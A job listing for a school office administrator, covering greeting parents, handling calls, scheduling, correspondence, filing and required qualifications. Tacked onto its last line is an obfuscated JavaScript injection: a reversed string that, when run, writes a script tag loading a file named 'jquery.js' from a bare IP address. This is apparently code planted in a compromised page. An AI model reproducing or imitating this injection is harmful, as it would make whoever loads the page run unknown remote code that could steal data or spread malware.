Industry : Education
JOB FUNCTIONS AND RESPONSIBILITIES:
– Meeting and greeting parents in the absence of other staff; interacting with parents and staff daily, handling routine queries.
– Attending to calls from parents, teachers and others.
– Operating personal computer to access e-mails, electronic calendar, and other basic office support software.
– Coordinating meetings and other work schedule for the school.
– Compiling and organizing reports, managing projects and schedules.
– Responding to or initiating phone calls to parents to determine need for assistance or referring parents to the appropriate area for assistance.
– Preparing or composing correspondence with the Principal’s advice.
– Preparing background or collateral materials for conferences, appointments, meetings, and conference calls.
– Monitoring and distributing correspondence and incoming mail.
– Maintaining a filing system and ordering office supplies as needed.
– Preparing minutes for staff/parent meetings.
– Education or Training – Bachelor Degree or High school diploma or Some College helpful in relevant job description.
– Experience—One to two years administrative experience.
– Special Skills and Personality Traits—Competency with word processing, e-mail and other office computer programs; strong organizational and communication skills.
– An observant and responsive approach;
– Flexibility – it is important to be able to respond to the needs of the children and adapt or change plans accordingly;
– A positive, energetic and enthusiastic outlook;
– Patience, understanding and empathy with pupils. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))